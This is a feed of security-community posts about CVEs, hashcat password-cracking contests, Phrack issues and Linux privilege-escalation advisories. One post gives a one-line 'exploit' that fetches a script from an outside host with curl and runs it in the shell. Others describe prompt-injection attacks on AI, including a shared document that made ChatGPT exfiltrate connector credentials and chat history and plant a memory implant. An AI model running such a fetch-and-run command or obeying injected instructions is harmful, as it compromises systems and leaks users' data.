There’s a #vulnerability (CVE-2024-27867) in the #firmware of Apple #AirPods. Anyone who knows the #Bluetooth MAC address can connect to your AirPods and listen to the microphone or play music. An update is available. blogs.gnome.org/jdressler/2024…

Team hashcat has placed 2nd in the KoreLogic contest at #DEFCON32! Congrats to HashMob on 1st, and CynoSure Prime on 3rd place. Looking forward to your writeups! Big thanks to KoreLogic and Password Village for organizing the contest!

Philippe Teuwen paper is out, eprint.iacr.org/2024/1275.pdf An amazing read!

The time has come, and with it your reading material for the week. Phrack #71 is officially released ONLINE! Let us know what you think! phrack.org/issues/71/1.ht…

Exploiting Microsoft Teams on macOS during a Purple Team engagement blog.quarkslab.com/exploiting-mic… #Pentesting #CyberSecurity #Infosec

We updated our CFP for Phrack 72! The deadline is now April 1st 2025. Check the site for specifics on how to contribute, as well as some inspiration! We also posted a link to purchase physical copies of Phrack 71, and a donation link too. Enjoy! phrack.org

Complete hashcat benchmarks on the NVIDIA GeForce RTX 5090 FE! Running nice and cool so far with solid improvements across the board. Most hash modes got at least a 20% uplift over the RTX 4090 and some modes boasting quite a bit more! Full Benchmark: gist.github.com/Chick3nman/09b…

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL thc.org/7350pipe)”

March 8, 2022 Published this video trying to find a way to extract a smart meters firmware… youtu.be/kli-hRqRAys Three YEARS later… March 29, 2025 Published this video extracting the firmware and showing you how it’s done! youtu.be/IOD5voFTAz8 Never stop trying

The gcc/clang excuse for changing program behavior, often introducing bugs and security holes (see usenix.org/system/files/u…), is performance. But a new paper web.ist.utl.pt/nuno.lopes/pub… modifies clang to eliminate most (all?) such changes, and finds negligible effect on benchmarks.

New Linux Rootkit schneier.com/blog/archives/…

This is big ..😜 oligo.security/blog/airborne

CVE-2025-6019: libblockdev: LPE from allow_active to root openwall.com/lists/oss-secu… CVE-2025-6018: LPE from unprivileged to allow_active in *SUSE 15's PAM CVE-2025-6019: LPE from allow_active to root in libblockdev via udisks Patches: openwall.com/lists/oss-secu… x.com/qualys/status/…

some guy at Mastercard prompt injected a job posting and just days later it tricked somebody’s ai 😂

July 15th 1991: 34 years ago I published the first “modern” password cracker…

hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…

we got a persistent 0click on ChatGPT by sharing a doc that allowed us to exfiltrate sensitive data and creds from your connectors (google drive, sharepoint, ..) + chat history + future conversations it gets worse. we deploy a memory implant #DEFCON #BHUSA Tamir Ishay Sharbat

Binarly is celebrating Phrack Zine 40th anniversary! 61st floor energy. Legends only 🎉

Team Hashcat took first place in the Jabbercracky contest at #DEFCON33! Thanks to HashMob for putting up a great fight and congrats on 2nd place! We're looking forward to your write-up! Huge thanks to Jabbercracky, Will Hunt @[email protected], and Password Village for organizing!

We just finished the Jabbercracky password contest at DEFCON 33! Check out our writeup on using the new Python Bridge in hashcat 7 for rapid prototyping a solution to an unsupported hash mode: hashcat.net/forum/thread-1…